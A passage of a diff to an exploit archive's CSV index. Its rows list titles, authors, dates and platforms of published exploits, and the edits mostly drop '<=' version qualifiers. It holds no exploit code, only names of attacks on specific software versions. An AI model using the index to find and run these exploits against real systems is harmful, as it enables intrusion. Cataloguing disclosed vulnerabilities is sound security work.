PoC",2015-03-09,"Google Security Research",lin_x86-64,local,0 36311,platforms/lin_x86-64/local/36311.txt,"Rowhammer: NaCl Sandbox Escape PoC",2015-03-09,"Google Security Research",lin_x86-64,local,0 -36314,platforms/php/webapps/36314.txt,"webERP <= 4.3.8 reportwriter/ReportMaker.php reportid Parameter SQL Injection",2011-11-17,"High-Tech Bridge SA",php,webapps,0 -36315,platforms/php/webapps/36315.txt,"webERP <= 4.3.8 reportwriter/FormMaker.php ReportID Parameter SQL Injection",2011-11-17,"High-Tech Bridge SA",php,webapps,0 +36314,platforms/php/webapps/36314.txt,"webERP 4.3.8 reportwriter/ReportMaker.php reportid Parameter SQL Injection",2011-11-17,"High-Tech Bridge SA",php,webapps,0 +36315,platforms/php/webapps/36315.txt,"webERP 4.3.8 reportwriter/FormMaker.php ReportID Parameter SQL Injection",2011-11-17,"High-Tech Bridge SA",php,webapps,0 36316,platforms/php/webapps/36316.txt,"ZOHO ManageEngine ADSelfService Plus 4.5 Build 4521 Cross Site Scripting",2011-11-17,"James webb",php,webapps,0 36317,platforms/php/webapps/36317.txt,"WordPress Flexible Custom Post Type plugin - 'id' Parameter Cross Site Scripting",2011-11-17,Am!r,php,webapps,0 36318,platforms/windows/remote/36318.txt,"Jetty Web Server Directory Traversal",2011-11-18,"Alexey Sintsov",windows,remote,0 @@ -32807,9 +32807,9 @@ id,file,description,date,author,platform,type,port 36376,platforms/windows/remote/36376.txt,"Oxide WebServer Directory Traversal",2011-11-29,demonalex,windows,remote,0 36377,platforms/multiple/dos/36377.txt,"CoDeSys 3.4 HTTP POST Request NULL Pointer Content-Length Parsing Remote DoS",2011-11-30,"Luigi Auriemma",multiple,dos,0 36378,platforms/multiple/dos/36378.txt,"CoDeSys 3.4 NULL Pointer Invalid HTTP Request Parsing Remote DoS",2011-11-30,"Luigi Auriemma",multiple,dos,0 -36379,platforms/php/webapps/36379.txt,"OrangeHRM <= 2.6.11 index.php Multiple Parameter XSS",2011-11-30,"High-Tech Bridge SA",php,webapps,0 -36380,platforms/php/webapps/36380.txt,"OrangeHRM <= 2.6.11 lib/controllers/CentralController.php URI XSS",2011-11-30,"High-Tech Bridge SA",php,webapps,0 -36381,platforms/php/webapps/36381.txt,"OrangeHRM <= 2.6.11 lib/controllers/CentralController.php id Parameter SQL Injection",2011-11-30,"High-Tech Bridge SA",php,webapps,0 +36379,platforms/php/webapps/36379.txt,"OrangeHRM 2.6.11 index.php Multiple Parameter XSS",2011-11-30,"High-Tech Bridge SA",php,webapps,0 +36380,platforms/php/webapps/36380.txt,"OrangeHRM 2.6.11 lib/controllers/CentralController.php URI XSS",2011-11-30,"High-Tech Bridge SA",php,webapps,0 +36381,platforms/php/webapps/36381.txt,"OrangeHRM 2.6.11 lib/controllers/CentralController.php id Parameter SQL Injection",2011-11-30,"High-Tech Bridge SA",php,webapps,0 36382,platforms/php/webapps/36382.txt,"WordPress 1-jquery-photo-gallery-slideshow-flash Plugin 1.01 Cross Site Scripting",2011-11-30,Am!r,php,webapps,0 36383,platforms/php/webapps/36383.txt,"WordPress flash-album-gallery Plugin 'facebook.php' Cross Site Scripting",2011-11-30,Am!r,php,webapps,0 36384,platforms/php/webapps/36384.txt,"SugarCRM Community Edition 6.3.0RC1 - 'index.php' Multiple SQL Injection Vulnerabilities",2011-11-30,"High-Tech Bridge SA",php,webapps,0 @@ -32853,7 +32853,7 @@ id,file,description,date,author,platform,type,port 36422,platforms/windows/dos/36422.txt,"Fortinet Single Sign On - Stack Overflow",2015-03-18,"Core Security",windows,dos,8000 36423,platforms/java/webapps/36423.txt,"Websense Appliance Manager Command Injection",2015-03-18,"Han Sahin",java,webapps,9447 36424,platforms/windows/local/36424.txt,"Windows 8.1 - Local WebDAV NTLM Reflection Elevation of Privilege",2015-03-19,"Google Security Research",windows,local,0 -36425,platforms/linux/dos/36425.txt,"Linux Kernel <= 2.6.35 - Network Namespace Remote Denial of Service",2011-12-06,"Serge Hallyn",linux,dos,0 +36425,platforms/linux/dos/36425.txt,"Linux Kernel 2.6.35 - Network Namespace Remote Denial of Service",2011-12-06,"Serge Hallyn",linux,dos,0 36426,platforms/multiple/remote/36426.txt,"Apache Struts 2.0.9/2.1.8 Session Tampering Security Bypass",2011-12-07,"Hisato Killing",multiple,remote,0 36427,platforms/windows/dos/36427.txt,"PowerDVD 11.0.0.2114 Remote Denial of Service",2011-12-07,"Luigi Auriemma",windows,dos,0 36428,platforms/hardware/remote/36428.txt,"Axis M10 Series Network Cameras Cross Site Scripting",2011-12-07,"Matt Metzger",hardware,remote,0 @@ -32891,13 +32891,13 @@ id,file,description,date,author,platform,type,port 36460,platforms/php/webapps/36460.txt,"Flirt-Projekt 4.8 - 'rub' Parameter SQL Injection",2011-12-17,Lazmania61,php,webapps,0 36461,platforms/php/webapps/36461.txt,"Social Network Community 2 - 'userID' Parameter SQL Injection",2011-12-17,Lazmania61,php,webapps,0 36462,platforms/php/webapps/36462.txt,"Video Community Portal 'userID' Parameter SQL Injection",2011-12-18,Lazmania61,php,webapps,0 -36463,platforms/php/webapps/36463.txt,"Telescope <= 0.9.2 - Markdown Persistent XSS",2015-03-21,shubs,php,webapps,0 +36463,platforms/php/webapps/36463.txt,"Telescope 0.9.2 - Markdown Persistent XSS",2015-03-21,shubs,php,webapps,0 36464,platforms/php/webapps/36464.txt,"Joomla Spider FAQ Component - SQL Injection",2015-03-22,"Manish Tanwar",php,webapps,0 36465,platforms/windows/local/36465.py,"Free MP3 CD Ripper 2.6 - Local Buffer Overflow",2015-03-22,"TUNISIAN CYBER",windows,local,0 36466,platforms/php/webapps/36466.txt,"WordPress Marketplace 2.4.0 - Arbitrary File Download",2015-03-22,"Kacper Szurek",php,webapps,0 36468,platforms/php/webapps/36468.txt,"PHP Booking Calendar 10e 'page_info_message' Parameter Cross Site Scripting",2011-12-19,G13,php,webapps,0 36469,platforms/php/webapps/36469.txt,"Joomla! 'com_tsonymf' Component 'idofitem' Parameter SQL Injection",2011-12-20,CoBRa_21,php,webapps,0 -36470,platforms/php/webapps/36470.txt,"Tiki Wiki CMS Groupware <= 8.1 - 'show_errors' Parameter HTML Injection",2011-12-20,"Stefan Schurtz",php,webapps,0 +36470,platforms/php/webapps/36470.txt,"Tiki Wiki CMS Groupware 8.1 - 'show_errors' Parameter HTML Injection",2011-12-20,"Stefan Schurtz",php,webapps,0 36471,platforms/php/webapps/36471.txt,"PHPShop CMS 3.4 Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2011-12-20,"High-Tech Bridge SA",php,webapps,0 36472,platforms/php/webapps/36472.txt,"Joomla! 'com_caproductprices' Component 'id' Parameter SQL Injection",2011-12-20,CoBRa_21,php,webapps,0 36473,platforms/php/webapps/36473.txt,"Cyberoam UTM 10 - 'tableid' Parameter SQL Injection",2011-12-20,"Benjamin Kunz Mejri",php,webapps,0 @@ -32935,7 +32935,7 @@ id,file,description,date,author,platform,type,port 36513,platforms/windows/remote/36513.txt,"IpTools 0.1.4 Tiny TCP/IP servers Directory Traversal",2012-01-06,demonalex,windows,remote,0 36514,platforms/windows/remote/36514.pl,"IPtools 0.1.4 Remote Command Server Buffer Overflow",2012-01-06,demonalex,windows,remote,0 36515,platforms/asp/webapps/36515.txt,"DIGIT CMS 1.0.7 Cross Site Scripting and SQL Injection Vulnerabilities",2012-01-07,"BHG Security Center",asp,webapps,0 -36516,platforms/windows/remote/36516.py,"Acunetix <= 9.5 - OLE Automation Array Remote Code Execution",2015-03-27,"Naser Farhadi",windows,remote,0 +36516,platforms/windows/remote/36516.py,"Acunetix 9.5 - OLE Automation Array Remote Code Execution",2015-03-27,"Naser Farhadi",windows,remote,0 36517,platforms/windows/remote/36517.html,"WebGate WinRDS 2.0.8 - StopSiteAllChannel Stack Overflow",2015-03-27,"Praveen Darshanam",windows,remote,0 36518,platforms/windows/remote/36518.html,"WebGate Control Center 4.8.7 - GetThumbnail Stack Overflow",2015-03-27,"Praveen Darshanam",windows,remote,0 36519,platforms/windows/remote/36519.html,"WebGate eDVR Manager 2.6.4 - SiteName Stack Overflow",2015-03-27,"Praveen Darshanam",windows,remote,0 @@ -32957,23 +32957,23 @@ id,file,description,date,author,platform,type,port 36535,platforms/php/webapps/36535.txt,"MARINET CMS galleryphoto.php id Parameter SQL Injection",2012-01-09,"H4ckCity Security Team",php,webapps,0 36536,platforms/php/webapps/36536.txt,"MARINET CMS gallery.php id Parameter SQL Injection",2012-01-09,"H4ckCity Security Team",php,webapps,0 36537,platforms/multiple/remote/36537.txt,"SonicWall AntiSpam & EMail 7.3.1 Multiple Security vulnerabilities",2012-01-10,"Benjamin Kunz Mejri",multiple,remote,0 -36538,platforms/php/webapps/36538.txt,"Gregarius <= 0.6.1 Multiple SQL Injection and Cross Site Scripting Vulnerabilities",2012-01-09,sonyy,php,webapps,0 +36538,platforms/php/webapps/36538.txt,"Gregarius 0.6.1 Multiple SQL Injection and Cross Site Scripting Vulnerabilities",2012-01-09,sonyy,php,webapps,0 36539,platforms/php/webapps/36539.txt,"Advanced File Management 1.4 - 'users.php' Cross Site Scripting",2012-01-09,Am!r,php,webapps,0 36540,platforms/php/webapps/36540.txt,"WordPress Age Verification plugin 0.4 - 'redirect_to' Parameter URI Redirection",2012-01-10,"Gianluca Brindisi",php,webapps,0 36541,platforms/php/webapps/36541.txt,"PHP-Fusion 7.2.4 - 'downloads.php' Cross Site Scripting",2012-01-10,Am!r,php,webapps,0 36542,platforms/windows/remote/36542.txt,"ExpressView Browser Plugin 6.5.0.3330 - Multiple Integer Overflow and Remote Code Execution Vulnerabilities",2012-01-11,"Luigi Auriemma",windows,remote,0 36543,platforms/php/webapps/36543.txt,"KnowledgeTree 3.x Multiple Cross Site Scripting Vulnerabilities",2012-01-11,"High-Tech Bridge SA",php,webapps,0 36544,platforms/php/webapps/36544.txt,"Kayako SupportSuite 3.x - Multiple Vulnerabilities",2012-01-11,"Yuri Goltsev",php,webapps,0 -36545,platforms/linux/dos/36545.txt,"Linux Kernel <= 3.1.8 - KVM Local Denial of Service",2011-12-29,"Stephan Sattler",linux,dos,0 +36545,platforms/linux/dos/36545.txt,"Linux Kernel 3.1.8 - KVM Local Denial of Service",2011-12-29,"Stephan Sattler",linux,dos,0 36546,platforms/windows/remote/36546.txt,"GreenBrowser 6.0.1002 - Search Bar Short Cut Button Double Free Remote Memory Corruption",2012-01-12,NCNIPC,windows,remote,0 -36547,platforms/asp/webapps/36547.txt,"MailEnable <= 6.02 - 'ForgottonPassword.aspx' Cross Site Scripting",2012-01-12,"Sajjad Pourali",asp,webapps,0 +36547,platforms/asp/webapps/36547.txt,"MailEnable 6.02 - 'ForgottonPassword.aspx' Cross Site Scripting",2012-01-12,"Sajjad Pourali",asp,webapps,0 36548,platforms/java/webapps/36548.txt,"Contus Job Portal 'Category' Parameter SQL Injection",2012-01-13,Lazmania61,java,webapps,0 36549,platforms/php/webapps/36549.txt,"Joomla! HD Video Share Component 1.3 - 'id' Parameter SQL Injection",2012-01-12,Lazmania61,php,webapps,0 36550,platforms/php/webapps/36550.txt,"PHP Membership Site Manager Script 2.1 - 'index.php' Cross Site Scripting",2012-01-16,Atmon3r,php,webapps,0 36551,platforms/php/webapps/36551.txt,"PHP Ringtone Website 'ringtones.php' Multiple Cross Site Scripting Vulnerabilities",2012-01-15,Atmon3r,php,webapps,0 36552,platforms/php/webapps/36552.txt,"BoltWire 3.4.16 Multiple 'index.php' Cross Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0 36553,platforms/java/webapps/36553.java,"JBoss JMXInvokerServlet JMXInvoker 0.3 - Remote Command Execution",2015-03-30,ikki,java,webapps,0 -36554,platforms/php/webapps/36554.txt,"WordPress Plugin Slider Revolution <= 4.1.4 - Arbitrary File Download",2015-03-30,"Claudio Viviani",php,webapps,0 +36554,platforms/php/webapps/36554.txt,"WordPress Plugin Slider Revolution 4.1.4 - Arbitrary File Download",2015-03-30,"Claudio Viviani",php,webapps,0 36747,platforms/linux/local/36747.c,"abrt (Fedora 21) - Race Condition Exploit",2015-04-14,"Tavis Ormandy",linux,local,0 36559,platforms/php/webapps/36559.txt,"WordPress aspose-doc-exporter Plugin 1.0 - Arbitrary File Download",2015-03-30,ACC3SS,php,webapps,0 36560,platforms/php/webapps/36560.txt,"Joomla Gallery WD Component - SQL Injection",2015-03-30,CrashBandicot,php,webapps,0 @@ -33004,16 +33004,16 @@ id,file,description,date,author,platform,type,port 36586,platforms/php/webapps/36586.txt,"Syneto Unified Threat Management 1.3.3/1.4.2 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2012-01-20,"Alexander Fuchs",php,webapps,0 36587,platforms/windows/remote/36587.py,"Savant Web Server 3.1 Remote Buffer Overflow",2012-01-21,red-dragon,windows,remote,0 36588,platforms/asp/webapps/36588.txt,"Acidcat ASP CMS 3.5 Multiple Cross Site Scripting Vulnerabilities",2012-01-21,"Avram Marius",asp,webapps,0 -36589,platforms/php/webapps/36589.txt,"Joomla! 'com_br' Component 'controller' Parameter Local File Include",2012-01-23,the_cyber_nuxbie,php,webapps,0 +36589,platforms/php/webapps/36589.txt,"Joomla! 'com_br' Component 'controller' Parameter Local File Inclusion",2012-01-23,the_cyber_nuxbie,php,webapps,0 36590,platforms/php/webapps/36590.txt,"Tribiq CMS 'index.php' SQL Injection",2012-01-21,"Skote Vahshat",php,webapps,0 36591,platforms/php/webapps/36591.txt,"Joomla! Full 'com_full' Component 'id' Parameter SQL Injection",2012-01-21,the_cyber_nuxbie,php,webapps,0 36592,platforms/php/webapps/36592.txt,"Joomla 'com_sanpham' Component Multiple SQL Injection Vulnerabilities",2012-01-21,the_cyber_nuxbie,php,webapps,0 36593,platforms/php/webapps/36593.txt,"Joomla! 'com_xball' Component 'team_id' Parameter SQL Injection",2012-01-23,CoBRa_21,php,webapps,0 -36594,platforms/php/webapps/36594.txt,"Joomla! 'com_boss' Component 'controller' Parameter Local File Include",2012-01-21,the_cyber_nuxbie,php,webapps,0 +36594,platforms/php/webapps/36594.txt,"Joomla! 'com_boss' Component 'controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0 36595,platforms/php/webapps/36595.txt,"Joomla 'com_car' Component Multiple SQL Injection Vulnerabilities",2012-01-21,the_cyber_nuxbie,php,webapps,0 -36596,platforms/php/webapps/36596.txt,"Joomla! 'com_some' Component 'controller' Parameter Local File Include",2012-01-21,the_cyber_nuxbie,php,webapps,0 -36597,platforms/php/webapps/36597.txt,"Joomla! 'com_bulkenquery' Component 'controller' Parameter Local File Include",2012-01-21,the_cyber_nuxbie,php,webapps,0 -36598,platforms/php/webapps/36598.txt,"Joomla! 'com_kp' Component 'controller' Parameter Local File Include",2012-01-21,the_cyber_nuxbie,php,webapps,0 +36596,platforms/php/webapps/36596.txt,"Joomla! 'com_some' Component 'controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0 +36597,platforms/php/webapps/36597.txt,"Joomla! 'com_bulkenquery' Component 'controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0 +36598,platforms/php/webapps/36598.txt,"Joomla! 'com_kp' Component 'controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0 36599,platforms/asp/webapps/36599.txt,"Raven 1.0 - 'connector.asp' Arbitrary File Upload",2012-01-21,HELLBOY,asp,webapps,0 36600,platforms/php/webapps/36600.txt,"WordPress Business Intelligence Plugin - SQL injection (Metasploit)",2015-04-02,"Jagriti Sahu",php,webapps,80 36601,platforms/php/webapps/36601.txt,"Joomla Spider Random Article Component - SQL Injection",2015-04-02,"Jagriti Sahu",php,webapps,80 @@ -33041,42 +33041,42 @@ id,file,description,date,author,platform,type,port 36625,platforms/php/webapps/36625.txt,"OSClass 2.3.3 index.php sCategory Parameter SQL Injection",2012-01-25,"High-Tech Bridge SA",php,webapps,0 36626,platforms/php/webapps/36626.txt,"OSClass 2.3.3 index.php getParam() Function Multiple Parameter XSS",2012-01-25,"High-Tech Bridge SA",php,webapps,0 36627,platforms/php/webapps/36627.txt,"DClassifieds 0.1 final Cross Site Request Forgery",2012-01-25,"High-Tech Bridge SA",php,webapps,0 -36628,platforms/php/webapps/36628.txt,"vBadvanced CMPS 3.2.2 - 'vba_cmps_include_bottom.php' Remote File Include",2012-01-25,PacketiK,php,webapps,0 +36628,platforms/php/webapps/36628.txt,"vBadvanced CMPS 3.2.2 - 'vba_cmps_include_bottom.php' Remote File Inclusion",2012-01-25,PacketiK,php,webapps,0 36629,platforms/php/webapps/36629.txt,"Joomla! 'com_motor' Component 'cid' Parameter SQL Injection",2012-01-26,the_cyber_nuxbie,php,webapps,0 36630,platforms/php/webapps/36630.txt,"Joomla 'com_products' Component Multiple SQL Injection Vulnerabilities",2012-01-26,the_cyber_nuxbie,php,webapps,0 36631,platforms/php/webapps/36631.txt,"WordPress Slideshow Gallery Plugin 1.1.x - 'border' Parameter Cross Site Scripting",2012-01-26,"Bret Hawk",php,webapps,0 36632,platforms/php/webapps/36632.txt,"xClick Cart 1.0.x - 'shopping_url' Parameter Cross Site Scripting",2012-01-26,sonyy,php,webapps,0 36633,platforms/linux/dos/36633.txt,"Wireshark - Buffer Underflow and Denial of Service Vulnerabilities",2012-01-10,"Laurent Butti",linux,dos,0 -36634,platforms/php/webapps/36634.txt,"Joomla! 'com_visa' Component Local File Include and SQL Injection Vulnerabilities",2012-01-28,the_cyber_nuxbie,php,webapps,0 +36634,platforms/php/webapps/36634.txt,"Joomla! 'com_visa' Component Local File Inclusion and SQL Injection Vulnerabilities",2012-01-28,the_cyber_nuxbie,php,webapps,0 36635,platforms/php/webapps/36635.txt,"Joomla! 'com_firmy' Component 'Id' Parameter SQL Injection",2012-01-30,the_cyber_nuxbie,php,webapps,0 36637,platforms/lin_x86/shellcode/36637.c,"Linux/x86 - Disable ASLR shellcode (84 bytes)",2015-04-03,"Mohammad Reza Ramezani",lin_x86,shellcode,0 -36638,platforms/php/webapps/36638.txt,"Joomla! 'com_crhotels' Component 'catid' Parameter Remote SQL Injection",2012-01-31,the_cyber_nuxbie,php,webapps,0 -36639,platforms/php/webapps/36639.txt,"Joomla! 'com_propertylab' Component 'id' Parameter Remote SQL Injection",2012-01-30,the_cyber_nuxbie,php,webapps,0 +36638,platforms/php/webapps/36638.txt,"Joomla! 'com_crhotels' Component 'catid' Parameter SQL Injection",2012-01-31,the_cyber_nuxbie,php,webapps,0 +36639,platforms/php/webapps/36639.txt,"Joomla! 'com_propertylab' Component 'id' Parameter SQL Injection",2012-01-30,the_cyber_nuxbie,php,webapps,0 36640,platforms/php/webapps/36640.txt,"WordPress Work The Flow File Upload 2.5.2 - Arbitrary File Upload",2015-04-05,"Claudio Viviani",php,webapps,0 36641,platforms/php/webapps/36641.txt,"u-Auctions - Multiple Vulnerabilities",2015-04-05,*Don*,php,webapps,0 -36642,platforms/php/webapps/36642.txt,"Joomla! 'com_bbs' Component Multiple Remote SQL Injection Vulnerabilities",2012-01-30,the_cyber_nuxbie,php,webapps,0 +36642,platforms/php/webapps/36642.txt,"Joomla! 'com_bbs' Component Multiple SQL Injection Vulnerabilities",2012-01-30,the_cyber_nuxbie,php,webapps,0 36643,platforms/php/webapps/36643.txt,"4Images 1.7.10 - admin/categories.php cat_parent_id Parameter SQL Injection",2012-01-31,RandomStorm,php,webapps,0 36644,platforms/php/webapps/36644.txt,"4Images 1.7.10 - admin/categories.php cat_parent_id Parameter XSS",2012-01-31,RandomStorm,php,webapps,0 36645,platforms/php/webapps/36645.txt,"4Images 1.7.10 - admin/index.php redirect Parameter Arbitrary Site Redirect",2012-01-31,RandomStorm,php,webapps,0 36646,platforms/php/webapps/36646.txt,"Joomla! 'com_cmotour' Component 'id' Parameter SQL Injection",2012-01-28,the_cyber_nuxbie,php,webapps,0 36647,platforms/php/webapps/36647.txt,"Lead Capture 'login.php' Script Cross Site Scripting",2012-01-21,HashoR,php,webapps,0 -36648,platforms/php/webapps/36648.txt,"OpenEMR <= 4.1 interface/patient_file/encounter/trend_form.php formname Parameter Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",php,webapps,0 -36649,platforms/php/webapps/36649.txt,"OpenEMR <= 4.1 interface/patient_file/encounter/load_form.php formname Parameter Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",php,webapps,0 -36650,platforms/php/webapps/36650.txt,"OpenEMR <= 4.1 contrib/acog/print_form.php formname Parameter Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",php,webapps,0 -36651,platforms/php/webapps/36651.txt,"OpenEMR <= 4.1 interface/fax/fax_dispatch.php file Parameter exec() Call Arbitrary Shell Command Execution",2012-02-01,"High-Tech Bridge SA",php,webapps,0 +36648,platforms/php/webapps/36648.txt,"OpenEMR 4.1 interface/patient_file/encounter/trend_form.php formname Parameter Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",php,webapps,0 +36649,platforms/php/webapps/36649.txt,"OpenEMR 4.1 interface/patient_file/encounter/load_form.php formname Parameter Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",php,webapps,0 +36650,platforms/php/webapps/36650.txt,"OpenEMR 4.1 contrib/acog/print_form.php formname Parameter Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",php,webapps,0 +36651,platforms/php/webapps/36651.txt,"OpenEMR 4.1 interface/fax/fax_dispatch.php file Parameter exec() Call Arbitrary Shell Command Execution",2012-02-01,"High-Tech Bridge SA",php,webapps,0 36652,platforms/multiple/remote/36652.py,"w3tw0rk / Pitbull Perl IRC Bot Remote Code Execution PoC Exploit",2015-04-06,"Jay Turla",multiple,remote,6667 36653,platforms/jsp/remote/36653.rb,"JBoss Seam 2 File Upload and Execute",2015-04-06,Metasploit,jsp,remote,8080 36654,platforms/php/webapps/36654.txt,"phpLDAPadmin 1.2.2 - 'base' Parameter Cross Site Scripting",2012-02-01,andsarmiento,php,webapps,0 36655,platforms/php/webapps/36655.txt,"phpLDAPadmin 1.2.0.5-2 - 'server_id' Parameter Cross Site Scripting Vulnerabilities",2012-02-01,andsarmiento,php,webapps,0 36656,platforms/php/webapps/36656.txt,"GForge 5.7.1 Multiple Cross Site Scripting Vulnerabilities",2012-02-02,sonyy,php,webapps,0 -36657,platforms/php/webapps/36657.txt,"Joomla! 'com_bnf' Component 'seccion_id' Parameter Remote SQL Injection",2012-02-02,"Daniel Godoy",php,webapps,0 +36657,platforms/php/webapps/36657.txt,"Joomla! 'com_bnf' Component 'seccion_id' Parameter SQL Injection",2012-02-02,"Daniel Godoy",php,webapps,0 36658,platforms/php/webapps/36658.txt,"iknSupport 'search' Module Cross Site Scripting",2012-02-02,"Red Security TEAM",php,webapps,0 36659,platforms/php/webapps/36659.txt,"Joomla! Currency Converter Component 'from' Parameter Cross-Site Scripting",2012-02-02,"BHG Security Center",php,webapps,0 36660,platforms/php/webapps/36660.txt,"project-open 3.4.x - 'account-closed.tcl' Cross Site Scripting",2012-02-03,"Michail Poultsakis",php,webapps,0 36661,platforms/php/webapps/36661.txt,"PHP-Fusion 7.2.4 - 'weblink_id' Parameter SQL Injection",2012-02-03,Am!r,php,webapps,0 36662,platforms/windows/dos/36662.txt,"Edraw Diagram Component 5 ActiveX Control 'LicenseName()' Method Buffer Overflow",2012-02-06,"Senator of Pirates",windows,dos,0 -36663,platforms/linux/remote/36663.txt,"Apache HTTP Server <= 2.2.15 - 'mod_proxy' Reverse Proxy Security Bypass",2012-02-06,"Tomas Hoger",linux,remote,0 -36664,platforms/php/webapps/36664.txt,"Vespa 0.8.6 'getid3.php' Local File Include",2012-02-06,T0x!c,php,webapps,0 +36663,platforms/linux/remote/36663.txt,"Apache HTTP Server 2.2.15 - 'mod_proxy' Reverse Proxy Security Bypass",2012-02-06,"Tomas Hoger",linux,remote,0 +36664,platforms/php/webapps/36664.txt,"Vespa 0.8.6 'getid3.php' Local File Inclusion",2012-02-06,T0x!c,php,webapps,0 36665,platforms/php/webapps/36665.txt,"Simple Groupware 0.742 - 'export' Parameter Cross Site Scripting",2012-02-07,"Infoserve Security Team",php,webapps,0 36666,platforms/java/webapps/36666.txt,"ManageEngine ADManager Plus 5.2 Build 5210 DomainConfig.do operation Parameter XSS",2012-02-07,LiquidWorm,java,webapps,0 36667,platforms/java/webapps/36667.txt,"ManageEngine ADManager Plus 5.2 Build 5210 jsp/AddDC.jsp domainName Parameter XSS",2012-02-07,LiquidWorm,java,webapps,0 @@ -33097,12 +33097,12 @@ id,file,description,date,author,platform,type,port 36682,platforms/php/dos/36682.php,"PHP PDORow Object Remote Denial Of Service",2011-09-24,anonymous,php,dos,0 36683,platforms/php/webapps/36683.txt,"Dolibarr 3.x - 'adherents/fiche.php' SQL Injection",2012-02-10,"Benjamin Kunz Mejri",php,webapps,0 36684,platforms/java/webapps/36684.txt,"LxCenter Kloxo 6.1.10 Multiple HTML Injection Vulnerabilities",2012-02-10,anonymous,java,webapps,0 -36685,platforms/php/webapps/36685.txt,"CubeCart <= 3.0.20 Multiple Script redir Parameter Arbitrary Site Redirect",2012-02-10,"Aung Khant",php,webapps,0 -36686,platforms/php/webapps/36686.txt,"CubeCart <= 3.0.20 admin/login.php goto Parameter Arbitrary Site Redirect",2012-02-10,"Aung Khant",php,webapps,0 -36687,platforms/php/webapps/36687.txt,"CubeCart <= 3.0.20 switch.php r Parameter Arbitrary Site Redirect",2012-02-10,"Aung Khant",php,webapps,0 +36685,platforms/php/webapps/36685.txt,"CubeCart 3.0.20 Multiple Script redir Parameter Arbitrary Site Redirect",2012-02-10,"Aung Khant",php,webapps,0 +36686,platforms/php/webapps/36686.txt,"CubeCart 3.0.20 admin/login.php goto Parameter Arbitrary Site Redirect",2012-02-10,"Aung Khant",php,webapps,0 +36687,platforms/php/webapps/36687.txt,"CubeCart 3.0.20 switch.php r Parameter Arbitrary Site Redirect",2012-02-10,"Aung Khant",php,webapps,0 36688,platforms/php/webapps/36688.html,"Zen Cart 1.3.9h 'path_to_admin/product.php' Cross Site Request Forgery",2012-02-10,DisK0nn3cT,php,webapps,0 36689,platforms/linux/webapps/36689.txt,"BOA Web Server 0.94.8.2 - Arbitrary File Access",2000-12-19,llmora,linux,webapps,0 -36690,platforms/linux/remote/36690.rb,"Barracuda Firmware <= 5.0.0.012 - Post Auth Remote Root exploit (Metasploit)",2015-04-09,xort,linux,remote,8000 +36690,platforms/linux/remote/36690.rb,"Barracuda Firmware 5.0.0.012 - Post Auth Remote Root exploit (Metasploit)",2015-04-09,xort,linux,remote,8000 36691,platforms/php/webapps/36691.txt,"WordPress Windows Desktop and iPhone Photo Uploader Plugin Arbitrary File Upload",2015-04-09,"Manish Tanwar",php,webapps,80 36692,platforms/osx/local/36692.py,"Mac OS X < 10.7.5/10.8.2/10.9.5/10.10.2 - 'Rootpipe' Privilege Escalation",2015-04-09,"Emil Kvarnhammar",osx,local,0 36693,platforms/php/webapps/36693.txt,"RabbitWiki 'title' Parameter Cross Site Scripting",2012-02-10,sonyy,php,webapps,0 @@ -33145,14 +33145,14 @@ id,file,description,date,author,platform,type,port 36731,platforms/php/webapps/36731.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_iplink.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36732,platforms/php/webapps/36732.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_ports.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36733,platforms/php/webapps/36733.txt,"WordPress Plugin 'WP Mobile Edition' 2.7 - Remote File Disclosure",2015-04-13,"Khwanchai Kaewyos",php,webapps,0 -36735,platforms/php/webapps/36735.txt,"WordPress Duplicator <= 0.5.14 - SQL Injection & CSRF",2015-04-13,"Claudio Viviani",php,webapps,0 +36735,platforms/php/webapps/36735.txt,"WordPress Duplicator 0.5.14 - SQL Injection & CSRF",2015-04-13,"Claudio Viviani",php,webapps,0 36736,platforms/php/webapps/36736.txt,"Traidnt Up 3.0 - SQL Injection",2015-04-13,"Ali Trixx",php,webapps,0 36738,platforms/php/webapps/36738.txt,"WordPress N-Media Website Contact Form with File Upload 1.3.4 - Shell Upload",2015-04-13,"Claudio Viviani",php,webapps,0 36746,platforms/linux/local/36746.c,"Apport/Abrt (Ubuntu / Fedora) - Local Root Exploit",2015-04-14,"Tavis Ormandy",linux,local,0 36761,platforms/php/webapps/36761.txt,"WordPress MiwoFTP Plugin 1.0.5 CSRF Arbitrary File Deletion Exploit",2015-04-14,LiquidWorm,php,webapps,80 36741,platforms/linux/dos/36741.py,"Samba < 3.6.2 x86 - PoC",2015-04-13,sleepya,linux,dos,0 36742,platforms/linux/remote/36742.txt,"ProFTPd 1.3.5 - File Copy",2015-04-13,anonymous,linux,remote,0 -36743,platforms/linux/dos/36743.c,"Linux Kernel <= 3.13 / <= 3.14 (Ubuntu) - splice() System Call Local DoS",2015-04-13,"Emeric Nasi",linux,dos,0 +36743,platforms/linux/dos/36743.c,"Linux Kernel 3.13 / <= 3.14 (Ubuntu) - splice() System Call Local DoS",2015-04-13,"Emeric Nasi",linux,dos,0 36744,platforms/windows/remote/36744.rb,"Adobe Flash Player casi32 Integer Overflow",2015-04-13,Metasploit,windows,remote,0 36745,platforms/osx/local/36745.rb,"Mac OS X - 'Rootpipe' Privilege Escalation",2015-04-13,Metasploit,osx,local,0 36752,platforms/php/webapps/36752.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_sensor.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 @@ -33195,15 +33195,15 @@ id,file,description,date,author,platform,type,port 36789,platforms/php/dos/36789.php,"PHP 5.3.8 - Remote Denial Of Service",2011-12-18,anonymous,php,dos,0 